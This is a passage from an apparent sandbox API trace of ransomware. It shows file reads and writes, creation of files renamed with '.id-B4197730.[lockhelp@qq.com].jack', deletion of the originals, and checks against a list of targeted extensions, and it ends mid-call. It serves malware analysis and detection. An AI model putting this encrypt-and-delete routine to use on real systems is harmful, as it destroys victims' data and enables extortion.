lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0xd5b, lpOverlapped=0x0) returned 1 [0196.736] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xd60, lpOverlapped=0x0) returned 1 [0196.737] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.737] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.737] SetEndOfFile (hFile=0x3e4) returned 1 [0196.737] CloseHandle (hObject=0x3e4) returned 1 [0196.741] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.741] SetEndOfFile (hFile=0x3ec) returned 1 [0196.742] CloseHandle (hObject=0x3ec) returned 1 [0196.742] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.742] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 1 [0196.743] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.743] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.743] lstrlenW (lpString=".doc") returned 4 [0196.743] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.743] lstrlenW (lpString=".docx") returned 5 [0196.743] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.743] lstrlenW (lpString=".pdf") returned 4 [0196.743] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.743] lstrlenW (lpString=".xls") returned 4 [0196.743] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.743] lstrlenW (lpString=".xlsx") returned 5 [0196.743] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.743] lstrlenW (lpString=".ppt") returned 4 [0196.743] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.743] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.743] lstrlenW (lpString=".zip") returned 4 [0196.743] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.743] lstrlenW (lpString=".rar") returned 4 [0196.743] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.743] lstrlenW (lpString=".bz2") returned 4 [0196.743] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.743] lstrlenW (lpString=".7z") returned 3 [0196.743] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.744] lstrlenW (lpString=".dbf") returned 4 [0196.744] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.744] lstrlenW (lpString=".1cd") returned 4 [0196.744] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.744] lstrlenW (lpString=".jpg") returned 4 [0196.744] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.744] lstrlenW (lpString=".doc") returned 4 [0196.744] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.744] lstrlenW (lpString=".docx") returned 5 [0196.744] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.744] lstrlenW (lpString=".pdf") returned 4 [0196.744] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.744] lstrlenW (lpString=".xls") returned 4 [0196.744] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.744] lstrlenW (lpString=".xlsx") returned 5 [0196.744] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.744] lstrlenW (lpString=".ppt") returned 4 [0196.744] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.744] lstrlenW (lpString=".zip") returned 4 [0196.744] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.744] lstrlenW (lpString=".rar") returned 4 [0196.744] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.745] lstrlenW (lpString=".bz2") returned 4 [0196.745] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.745] lstrlenW (lpString=".7z") returned 3 [0196.745] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.745] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.745] lstrlenW (lpString=".dbf") returned 4 [0196.745] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.745] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.745] lstrlenW (lpString=".1cd") returned 4 [0196.745] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.745] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0196.745] lstrlenW (lpString=".jpg") returned 4 [0196.745] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.745] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0196.745] lstrlenW (lpString="LocalizedData.xml") returned 17 [0196.745] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.745] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=82346) returned 1 [0196.746] CloseHandle (hObject=0x3ec) returned 1 [0196.746] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 0x80 [0196.746] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.746] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.746] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.746] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.746] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0196.746] GetLastError () returned 0x0 [0196.746] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x141aa, lpOverlapped=0x0) returned 1 [0197.081] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x141b0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x141b0, lpOverlapped=0x0) returned 1 [0197.084] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.084] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.084] SetEndOfFile (hFile=0x3e4) returned 1 [0197.084] CloseHandle (hObject=0x3e4) returned 1 [0197.089] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.089] SetEndOfFile (hFile=0x3ec) returned 1 [0197.091] CloseHandle (hObject=0x3ec) returned 1 [0197.091] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.091] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 1 [0197.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.092] lstrlenW (lpString=".doc") returned 4 [0197.092] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.092] lstrlenW (lpString=".docx") returned 5 [0197.092] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.092] lstrlenW (lpString=".pdf") returned 4 [0197.092] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.092] lstrlenW (lpString=".xls") returned 4 [0197.092] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.092] lstrlenW (lpString=".xlsx") returned 5 [0197.092] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.092] lstrlenW (lpString=".ppt") returned 4 [0197.092] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.092] lstrlenW (lpString=".zip") returned 4 [0197.092] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.092] lstrlenW (lpString=".rar") returned 4 [0197.092] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.092] lstrlenW (lpString=".bz2") returned 4 [0197.092] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.092] lstrlenW (lpString=".7z") returned 3 [0197.092] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.093] lstrlenW (lpString=".dbf") returned 4 [0197.093] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.093] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.093] lstrlenW (lpString=".1cd") returned 4 [0197.093] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.093] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.093] lstrlenW (lpString=".jpg") returned 4 [0197.093] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.093] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.093] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.093] lstrlenW (lpString=".doc") returned 4 [0197.093] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.093] lstrlenW (lpString=".docx") returned 5 [0197.093] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.093] lstrlenW (lpString=".pdf") returned 4 [0197.093] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.093] lstrlenW (lpString=".xls") returned 4 [0197.093] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.093] lstrlenW (lpString=".xlsx") returned 5 [0197.093] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.093] lstrlenW (lpString=".ppt") returned 4 [0197.093] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.093] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.093] lstrlenW (lpString=".zip") returned 4 [0197.093] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.093] lstrlenW (lpString=".rar") returned 4 [0197.093] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.093] lstrlenW (lpString=".bz2") returned 4 [0197.094] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.094] lstrlenW (lpString=".7z") returned 3 [0197.094] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.094] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.094] lstrlenW (lpString=".dbf") returned 4 [0197.094] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.094] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.094] lstrlenW (lpString=".1cd") returned 4 [0197.094] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.094] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0197.094] lstrlenW (lpString=".jpg") returned 4 [0197.094] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.094] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.094] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.094] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0197.094] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=82962) returned 1 [0197.094] CloseHandle (hObject=0x3ec) returned 1 [0197.095] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 0x80 [0197.095] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.095] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0197.095] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.095] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.095] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0197.097] GetLastError () returned 0x0 [0197.097] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x14412, lpOverlapped=0x0) returned 1 [0197.121] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x14420, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x14420, lpOverlapped=0x0) returned 1 [0197.124] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.124] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.124] SetEndOfFile (hFile=0x3e4) returned 1 [0197.124] CloseHandle (hObject=0x3e4) returned 1 [0197.129] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.129] SetEndOfFile (hFile=0x3ec) returned 1 [0197.131] CloseHandle (hObject=0x3ec) returned 1 [0197.131] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.131] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 1 [0197.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.132] lstrlenW (lpString=".doc") returned 4 [0197.132] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.132] lstrlenW (lpString=".docx") returned 5 [0197.132] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.132] lstrlenW (lpString=".pdf") returned 4 [0197.132] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.132] lstrlenW (lpString=".xls") returned 4 [0197.132] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.132] lstrlenW (lpString=".xlsx") returned 5 [0197.132] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.132] lstrlenW (lpString=".ppt") returned 4 [0197.132] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.132] lstrlenW (lpString=".zip") returned 4 [0197.132] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.132] lstrlenW (lpString=".rar") returned 4 [0197.132] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.132] lstrlenW (lpString=".bz2") returned 4 [0197.132] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.132] lstrlenW (lpString=".7z") returned 3 [0197.132] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.132] lstrlenW (lpString=".dbf") returned 4 [0197.132] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.132] lstrlenW (lpString=".1cd") returned 4 [0197.132] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.133] lstrlenW (lpString=".jpg") returned 4 [0197.133] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.133] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.133] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.133] lstrlenW (lpString=".doc") returned 4 [0197.133] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.133] lstrlenW (lpString=".docx") returned 5 [0197.133] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.133] lstrlenW (lpString=".pdf") returned 4 [0197.133] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.133] lstrlenW (lpString=".xls") returned 4 [0197.133] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.133] lstrlenW (lpString=".xlsx") returned 5 [0197.133] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.133] lstrlenW (lpString=".ppt") returned 4 [0197.133] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.133] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.133] lstrlenW (lpString=".zip") returned 4 [0197.133] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.133] lstrlenW (lpString=".rar") returned 4 [0197.133] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.133] lstrlenW (lpString=".bz2") returned 4 [0197.133] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.133] lstrlenW (lpString=".7z") returned 3 [0197.133] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.133] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.133] lstrlenW (lpString=".dbf") returned 4 [0197.133] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.134] lstrlenW (lpString=".1cd") returned 4 [0197.134] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0197.134] lstrlenW (lpString=".jpg") returned 4 [0197.134] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.134] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.134] lstrlenW (lpString="eula.rtf") returned 8 [0197.134] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0197.134] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=6851) returned 1 [0197.134] CloseHandle (hObject=0x3ec) returned 1 [0197.134] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 0x80 [0197.134] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.135] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0197.135] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.135] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.135] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0197.135] GetLastError () returned 0x0 [0197.135] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x1ac3, lpOverlapped=0x0) returned 1 [0197.634] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x1ad0, lpOverlapped=0x0) returned 1 [0197.635] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.635] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.635] SetEndOfFile (hFile=0x3e4) returned 1 [0197.635] CloseHandle (hObject=0x3e4) returned 1 [0197.636] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.636] SetEndOfFile (hFile=0x3ec) returned 1 [0197.637] CloseHandle (hObject=0x3ec) returned 1 [0197.637] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.638] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 1 [0197.638] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.638] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0197.638] lstrlenW (lpString=".doc") returned 4 [0197.638] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.638] lstrlenW (lpString=".docx") returned 5 [0197.638] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.638] lstrlenW (lpString=".pdf") returned 4 [0197.638] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.638] lstrlenW (lpString=".xls") returned 4 [0197.638] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.638] lstrlenW (lpString=".xlsx") returned 5 [0197.638] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.638] lstrlenW (lpString=".ppt") returned 4 [0197.638] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.638] lstrlenW 